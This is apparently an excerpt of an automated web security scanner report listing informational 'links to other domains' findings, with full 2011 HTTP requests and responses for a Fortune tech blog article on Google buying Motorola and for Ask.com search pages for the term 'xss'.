<p><img class="robots-nocontent" src="http://pixel.quantserve.com/pixel/p-18-mFEk4J448M.gif?labels=language.en%2Ctype.wpcom%2Cposttag.android%2Cposttag.apple%2Cposttag.droid%2Cposttag.google%2Cposttag.intellectual-property%2Cposttag.ios%2Cposttag.mobile%2Cposttag.motorola%2Cposttag.patents%2Cposttag.sanjay-jha%2Cposttag.xoom%2Cvip.fortunebrainstormtech" style="display:none" height="1" width="1" alt="" /></p>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?w&#038;ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1311367674g&amp;ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
<p class="robots-nocontent"><img src="http://b.scorecardresearch.com/p?cj=1c1=2&#038;c2=7518284" alt="" style="display:none" width="1" height="1" /></p></noscript><script src="http://s.stats.wordpress.com/w.js?20" type="text/javascript"></script>
...[SNIP]...

13.43. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tech.fortune.cnn.com
Path:   /2011/08/15/is-google-buying-motorola-for-its-17000-patents/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL HTTP/1.1
Host: tech.fortune.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:48:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 15 Aug 2011 18:47:08 +0000
Cache-Control: max-age=197, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://tech.fortune.cnn.com/xmlrpc.php
Link: <http://wp.me/pzwtX-ho8>; rel=shortlink
X-nananana: Batcache
Content-Length: 55611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en">
<!--
   generated 103 seconds ago
   generated in 0.223
...[SNIP]...
<meta property="fb:page_id" content="139321929435426"/>
<link rel="profile" href="http://gmpg.org/xfn/11" />
   <link rel="shortcut icon" href="http://i.cdn.turner.com/money/.element/img/5.0/fortune/icons/favicon.ico" />
<link rel="pingback" href="http://tech.fortune.cnn.com/xmlrpc.php" />
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/ssi/css/2.0/pkg/cnnmoney.blog/latest.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/2.0/pkg/cnnmoney.main/latest.js"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/jquery/1.5.1/jquery.js"></script>
...[SNIP]...
</script>-->


<link rel="stylesheet" type="text/css" media="all" href="http://s1.wp.com/wp-content/themes/vip/cnnmoneybasic2/style.css?m=1307567385g" />
<script type="text/javascript">
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/fn_adspaces/cnn_adspaces.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache-01.cleanprint.net/cp/ccg?divId=2435&ps=427' name='cleanprintloader'></script>
       <script src='http://wordpress.com/remote-login.php?action=js&amp;host=tech.fortune.cnn.com&amp;id=8466345&amp;t=1313434028&amp;back=tech.fortune.cnn.com%2F2011%2F08%2F15%2Fis-google-buying-motorola-for-its-17000-patents%2F' type="text/javascript"></script>
...[SNIP]...
</script>
<link rel="stylesheet" href="http://s0.wp.com/wp-content/themes/h4/global.css?m=1313010131g" type="text/css" />
<link rel='stylesheet' id='post-reactions-css' href='http://s0.wp.com/wp-content/mu-plugins/post-react-2/style.css?m=1313420637g&#038;ver=2' type='text/css' media='all' />
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1305826089g&amp;ver=1.6.1'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://fortunebrainstormtech.wordpress.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://fortunebrainstormtech.wordpress.com/wp-includes/wlwmanifest.xml" />
<link rel='index' title='Fortune Tech: Technology blogs, news and analysis from Fortune Magazine' href='http://tech.fortune.cnn.com/' />
...[SNIP]...
<link rel='canonical' href='http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/' />
<link rel='shortlink' href='http://wp.me/pzwtX-ho8' />
<link rel="alternate" type="application/json+oembed" href="http://public-api.wordpress.com/oembed/1.0/?format=json&url=http%3A%2F%2Ftech.fortune.cnn.com%2F2011%2F08%2F15%2Fis-google-buying-motorola-for-its-17000-patents%2F&for=wpcom-auto-discovery" /><link rel="alternate" type="application/xml+oembed" href="http://public-api.wordpress.com/oembed/1.0/?format=xml&url=http%3A%2F%2Ftech.fortune.cnn.com%2F2011%2F08%2F15%2Fis-google-buying-motorola-for-its-17000-patents%2F&for=wpcom-auto-discovery" /><link rel='openid.server' href='http://fortunebrainstormtech.wordpress.com/?openidserver=1' />
<link rel='openid.delegate' href='http://fortunebrainstormtech.wordpress.com/' />
<link rel="search" type="application/opensearchdescription+xml" href="http://tech.fortune.cnn.com/osd.xml" title="Fortune Tech: Technology blogs, news and analysis from Fortune Magazine" />
<link rel="search" type="application/opensearchdescription+xml" href="http://wordpress.com/opensearch.xml" title="WordPress.com" />
   <style type="text/css">
...[SNIP]...
<div id="cnnHeader" class="moneyTechNav">
       <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.1/cnnhat_section.js"></script>
...[SNIP]...
<a href="http://money.cnn.com/"><img src="http://i2.cdn.turner.com/money/.element/img/5.0/logos/cnnmoney_mainnav.gif" width="218" height="67" alt="CNNMoney" title="CNNMoney" class="img-logo" /></a>
...[SNIP]...
<li id="mm-share-twitter"><a href="http://twitter.com/cnnmoney" target="new"><img src="http://i.cdn.turner.com/money/.element/img/5.0/misc/social_nav_t.gif" height="20" width="20"></a></li>
       <li id="mm-like-facebook">
           <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fcnnmoney&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;height=27" scrolling="no" frameborder="0" allowTransparency="true"></iframe>
...[SNIP]...
<li><a href="http://cnnmoneytech.tumblr.com/">Tech&nbsp;Tumblr</a>
...[SNIP]...
<p><a href="http://fortunebrainstormtech.files.wordpress.com/2011/08/motogoogle.png"><img class="alignright size-full wp-image-66851" title="Motogoogle" src="http://fortunebrainstormtech.files.wordpress.com/2011/08/motogoogle.png?w=268&#038;h=326" alt="" width="268" height="326" /></a>
...[SNIP]...
</a>) <a href="http://googleblog.blogspot.com/2011/08/supercharging-android-google-to-acquire.html">announcement</a>
...[SNIP]...
nts important to the delivery of competitive products in the marketplace, video particularly compression, decompression and security technologies and finally, a leading position in 4G LTE essential." (<a href="http://fosspatents.blogspot.com/2011/08/motorola-doesnt-have-license-to-kill.html">link</a>
...[SNIP]...
ontrast, the values of telecom patents like the ones Motorola owns are rising faster than gold, and Google -- whose portfolio is particularly lacking -- needs them desperately. As Larry Page put it on <a href="http://googleblog.blogspot.com/2011/08/supercharging-android-google-to-acquire.html">Google's official blog</a>
...[SNIP]...
<em><a href="http://blogs.wsj.com/deals/2011/08/15/has-google-motorola-crushed-another-deal/?mod=yahoo_hs">Wall Street Journal</a>
...[SNIP]...
<em><a href="http://blogs.wsj.com/deals/2011/08/15/google-motorola-its-all-about-the-patents/?mod=yahoo_hs">Journal</a>
...[SNIP]...
<div class="boxHeading"><a href="http://twitter.com/philiped" target="new">Follow Philip Elmer-DeWitt</a>
...[SNIP]...
<div class="vcard">
       <img src="http://i2.cdn.turner.com/money/.element/img/1.0/sections/blogs/fortunebrainstormtech/philip_elmer_dewitt2_130.jpg" border="0" height="130" width="130" alt="Philip Elmer-Dewitt" class="photo" />
       <div class="fn">
...[SNIP]...
<div class="cnnHeadline"><a href="http://gettermsheet.com">The Term Sheet</a>
...[SNIP]...
<p> Receive Fortune's newsletter on all the deals that matter, from Wall Street to Sand Hill Road.
           <a href="http://gettermsheet.com">SUBSCRIBE</a>
...[SNIP]...
<a href="/magazines/fortune/fortune_archive/2011/08/15/toc.html" class="summaryImg"><img border="0" src="http://i2.cdn.turner.com/money/2011/images/07/28/fortune_20110815_150.jpg" alt="What happened at Pfizer" width="150" height="196"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://subscription.fortune.com/storefront/subscribe-to-fortune/site/fo-dnr0910.html?link=1002993" target="_blank">Give the gift of Fortune</a>
...[SNIP]...
<li><a href="http://itunes.apple.com/us/app/fortune-magazine/id382920959?mt=8#" target="_blank">Get the Fortune app</a>
...[SNIP]...
<li><a rel="nofollow" href="https://subscription.fortune.com/storefront/subscribe-to-fortune/site/fo-nb3term1010.html?link=1002984" target="_blank">Subscribe</a>
...[SNIP]...
<div class="cnnlogo"> <img src="http://i2.cdn.turner.com/money/.element/img/5.0/logos/cnnmoney_footer.gif" alt="CNNMoney.com" title="CNNMoney.com" /> </div>
...[SNIP]...
<li><a rel="nofollow" target="new" href="http://www.cnnmoneymediakit.com">Advertise with Us</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortunecareeropportunities.com">Career Opportunities</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortuneconferences.com">Conferences</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortunecouncil.com">Business Leader Council</a>
...[SNIP]...
<li id="footer_maglinkF"><a rel="nofollow" href="https://subscription.fortune.com/storefront/subscribe-to-fortune/link/1002982.html">Subscribe to Fortune</a>
...[SNIP]...
<li id="footer_maglinkM"><a rel="nofollow" href="https://subscription.money.com/storefront/subscribe-to-money/link/1003748.html">Subscribe to Money</a>
...[SNIP]...
<li><a rel="nofollow" href="https://subscription.fortune.com/storefront/subscribe-to-fortune/link/1003749.html">Give the Gift of Fortune</a>
...[SNIP]...
<li><a rel="nofollow" href="https://subscription.money.com/storefront/subscribe-to-money/link/1003746.html">Give the Gift of Money</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortunereprints.com">Reprints</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.timeincnewsgroupcustompub.com/">Special Sections</a>
...[SNIP]...
<li><a target="new" href="http://facebook.com/cnnmoney">Facebook</a>
...[SNIP]...
<li><a target="new" href="http://twitter.com/cnnmoney">Twitter</a>
...[SNIP]...
<li><a target="new" href="http://www.youtube.com/CNNMoney">YouTube</a>
...[SNIP]...
<li><a href="http://cnnmoneytech.tumblr.com/">Tumblr</a>
...[SNIP]...
<a href="/services/advertise/adchoices.html"> Ad choices <img src="http://i2.cdn.turner.com/money/.element/img/1.0/services/advertise/adchoiceslogo_footer.png" width="12" height="12" /></a>
...[SNIP]...
<!-- omniture & biztracking must be called separately -->    <script language="JavaScript" src="http://z.cdn.turner.com/money/.element/script/4.0/omniture/jsmd.js?20110803"></script>
...[SNIP]...
<!--BIZO Page TAG-->
   <img src="http://www.bizographics.com/collect/?fmt=gif&pid=311" style="display:none;" width="1" height="1" border="0" alt="">
   <!--/BIZO Page TAG-->
...[SNIP]...
<!-- Start Quantcast Measurement tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
   <a href="http://www.quantcast.com/p-5dyPa639IrgIw" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-5dyPa639IrgIw.gif" style="display: none" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
   <script src="http://js.revsci.net/gateway/gw.js?csid=H07710"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/2.0/pkg/cnnmoney.blog/latest.js"></script>    </div>
   <img src="http://i.cdn.turner.com/money/.element/img/1.0/misc/1.gif" alt="" id="TargetImageDE" name="TargetImageDE" width="1" height="1" onLoad="getDEAdHeadCookie(this)">
   
<div class="wpcopyright">Powered by <a href="http://wordpress.com/vip-hosting/" rel="generator">WordPress.com VIP</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<p><img class="robots-nocontent" src="http://pixel.quantserve.com/pixel/p-18-mFEk4J448M.gif?labels=language.en%2Ctype.wpcom%2Cposttag.android%2Cposttag.apple%2Cposttag.droid%2Cposttag.google%2Cposttag.intellectual-property%2Cposttag.ios%2Cposttag.mobile%2Cposttag.motorola%2Cposttag.patents%2Cposttag.sanjay-jha%2Cposttag.xoom%2Cvip.fortunebrainstormtech" style="display:none" height="1" width="1" alt="" /></p>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?w&#038;ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1311367665g&amp;ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
<p class="robots-nocontent"><img src="http://b.scorecardresearch.com/p?cj=1c1=2&#038;c2=7518284" alt="" style="display:none" width="1" height="1" /></p></noscript><script src="http://s.stats.wordpress.com/w.js?20" type="text/javascript"></script>
...[SNIP]...

13.44. http://www.ask.com/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news?o=0&l=dir&qsrc=168&q=xss HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllCApcQXAAAHyEWgcAAABd
from-tr: trafrt002iad.io.askjeeves.info
Cache-Control: private
Content-Length: 77175
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:27:20 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI3OjIwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:27:20 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
</a>


<a href="http://ask.pronto.com/user/search.do?&q=xss" class="txt3" style="color: #0055CC;">Shopping</a>
...[SNIP]...



<a href="http://www.askkids.com?o=0&l=dir"
class="txt3" style="color: #0055CC;">
Kids</a>
...[SNIP]...
<div id="r_t0">
<a class="txt_lg title" onmousedown="return pk(this,{en:'bnm',io:'0',b:'alg',tp:'d',ec:'3',url:'http%3A%2F%2Fwww.h-online.com%2Fsecurity%2Fnews%2Fitem%2FPotential-account-theft-with-XSS-hole-in-eBay-de-1320908.html'});"
target="_blank" href="http://c.moreover.com/click/here.pl?z5057314472&amp;z=1250248829">
Potential account theft with <b>
...[SNIP]...



                    <a href="http://www.google.com/aclk?sa=L&ai=C1oCUCGVJTsPILsO3gwfJ0qn8A7aV7ST6xID-Fvf5hBkQASCfkdURKANQ4vbI_QZgydb6hsijoBnIAQGqBBZP0AHWPK-_b-6WwqASd9N6MFl82fnZ&num=1&sig=AOD64_0iz3Mt9YIBxc2_xsKwiXW_QjXhmw&adurl=http://www.aspectsecurity.com/training.html" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(89); if (typeof efclk != 'undefined') efclk(89); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'3',ex:'sgst%3D1%26sgcl%3Da533lR-%2525voy%26sgch%3D%26sgmd%3D1'},'gg_0');" class="nu" onmouseover="return ss('www.aspectsecurity.com/training')" onmouseout="cs()" style="display:block;padding:15px 20px 10px 15px;">



...[SNIP]...



                    <a href="http://www.google.com/aclk?sa=L&ai=CIMsmCGVJTsPILsO3gwfJ0qn8A9qirwe6h5a5CISlo70CEAIgn5HVESgDUO_Tz0Vgydb6hsijoBnIAQGqBBZP0AHWPK-8b-7Pw5uu69j48LM-ZiFs&num=2&sig=AOD64_2ZDY-DGLStJt98MUQiVQVnBa6JCg&adurl=http://www.peterblum.com/des/inputsecurity.aspx" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(61); if (typeof efclk != 'undefined') efclk(61); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'3',ex:'sgst%3D1%26sgcl%3Da533lR-%2525voy%26sgch%3D%26sgmd%3D1'},'gg_1');" class="nu" onmouseover="return ss('www.peterblum.com')" onmouseout="cs()" style="display:block;padding:0px 20px 10px 15px;">



...[SNIP]...



                    <a href="http://www.google.com/aclk?sa=L&ai=C230qCGVJTsPILsO3gwfJ0qn8A87s4dkB7J3xwg_O6vIPEAMgn5HVESgDUMuYxYL5_____wFgydb6hsijoBnIAQGqBBxP0GHOAK-9b-7ewjMg3erGrFL-GROb2W-c0Ies&num=3&ggladgrp=416374914&gglcreat=4069686294&sig=AOD64_2VTOdMLvJbogrN6h1jY6Lf39LLJA&adurl=http://126.xg4ken.com/media/redir.php%3Fprof%3D8%26camp%3D444%26affcode%3Dkw351934%26cid%3D4069686294%26networkType%3Dsearch%26url%5B%5D%3Dhttp%253A%252F%252Fwww.target.com%252Fgp%252Fredirect.html%252Fref%253Dtgt_adv_XS000000%253FURL%253D%252Fgp%252Fsearch%25253Ffield-keywords%25253Dxxs%252526AFID%25253Dgoogle%252526CPNG%25253Dpets%252526LNM%25253DXXS%252526LID%25253D8p351934%252526adgroup%25253Dpets%252526MT%25253Dbroad%252526KID%25253D_kenshoo_clickid_" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(50); if (typeof efclk != 'undefined') efclk(50); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'3',ex:'sgst%3D1%26sgcl%3Da533lR-%2525voy%26sgch%3D%26sgmd%3D1'},'gg_2');" class="nu" onmouseover="return ss('www.target.com/FreeShipping')" onmouseout="cs()" style="display:block;padding:0px 20px 15px 15px;">



...[SNIP]...
<div id="r_t1">
<a class="txt_lg title" onmousedown="return pk(this,{en:'bnm',io:'1',b:'alg',tp:'d',ec:'3',url:'http%3A%2F%2Ffeeds.pcworld.com%2Fclick.phdo%3Fi%3Dc762f0dd663fd19ae83733752c2bf4af'});"
target="_blank" href="http://c.moreover.com/click/here.pl?z5042337493&amp;z=1250248829">
Bugs and Fixes: Apple Patches Safari and iOS Holes, Skype Blocks <b>
...[SNIP]...
<div id="r_t2">
<a class="txt_lg title" onmousedown="return pk(this,{en:'bnm',io:'2',b:'alg',tp:'d',ec:'3',url:'http%3A%2F%2Fwww.globalsecuritymag.com%2FVeracode-Makes-Urgent-Detection-of%2C20110802%2C25107.html'});"
target="_blank" href="http://c.moreover.com/click/here.pl?z5028575675&amp;z=1250248841">
Veracode Makes Urgent Detection of SQL Injection and <b>
...[SNIP]...



<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" id="" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...



<a href="http://asksupport.custhelp.com/app/answers/list" id="" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

13.45. http://www.ask.com/pictures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pictures?o=0&l=dir&qsrc=167&q=xss&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: Tklk8ApcQKMAAFY@f2wAAAEE
from-tr: trafrt011iad.io.askjeeves.info
Content-Length: 115264
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:56 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjU2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:26:56 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
</a>


<a href="http://ask.pronto.com/user/search.do?&q=xss" class="txt3" style="color: #0055CC;">Shopping</a>
...[SNIP]...



<a href="http://www.askkids.com?o=0&l=dir"
class="txt3" style="color: #0055CC;">
Kids</a>
...[SNIP]...
<div id="di0"><img id="image0" src="http://media2.picsearch.com/is?1Aemy_pvVeQBaY6537DmXW1zPaFoc-puZwtZNw4sFSM" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di1"><img id="image1" src="http://media2.picsearch.com/is?9_uQ-3tPaYu7wZjK7wrUzkbr4g6MZKta3nG7zOpmQTY" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di2"><img id="image2" src="http://media5.picsearch.com/is?Z6y7aBM0OeulcXcLwbIiofRYPQtqoY7KPxQj5wpUFkA" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di3"><img id="image3" src="http://media4.picsearch.com/is?JuK-vkc27Rclkk-nZfn9nqMsMJ3cJbQGWA8y_Ts1HxE" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di4"><img id="image4" src="http://media2.picsearch.com/is?JdaDoTf7TfqBaMk2lwl5QnyspvybvoHAJILXgME9XuU" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di5"><img id="image5" src="http://media2.picsearch.com/is?he-5FLdNUOto5V9iqoamNNEYjEJkNb_WeUbOQDbwXNA" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di6"><img id="image6" src="http://media1.picsearch.com/is?PF2IQLl4HbJP2KV734tDhJTfnP6GAwOeB_VWHC9zPwk" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di7"><img id="image7" src="http://media2.picsearch.com/is?R8K3N4JSEPKJqOoNJc3V7NlCKjKUv5s3KUb9DoxoiSA" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di8"><img id="image8" src="http://media5.picsearch.com/is?LizEIJ99sbs211ixkqjMnplBtS3AjfGaadnZHZ13XbY" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di9"><img id="image9" src="http://media4.picsearch.com/is?ergdVNZEO_RfJffNEWknMGWIjJp17lSuAlGwW8FbDlk" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di10"><img id="image10" src="http://media4.picsearch.com/is?UBEriv_LpvZ-s6YV36eyhIAhJjFQVBIVm8RI1t7PlfU" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di11"><img id="image11" src="http://media4.picsearch.com/is?jVshkH8bMOzEkF5uDY96xFqSqSO49PJxq6jDEfaSzd4" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di12"><img id="image12" src="http://media1.picsearch.com/is?Zf7dX1dxFxM2L0iKSP8jVVVSocNS9xrEHQ5XJsMoKVU" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di13"><img id="image13" src="http://media1.picsearch.com/is?DJW-3_Wuj6iqphmjkaiUP7JhCak6OHfMJT0nHpvHyHg" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
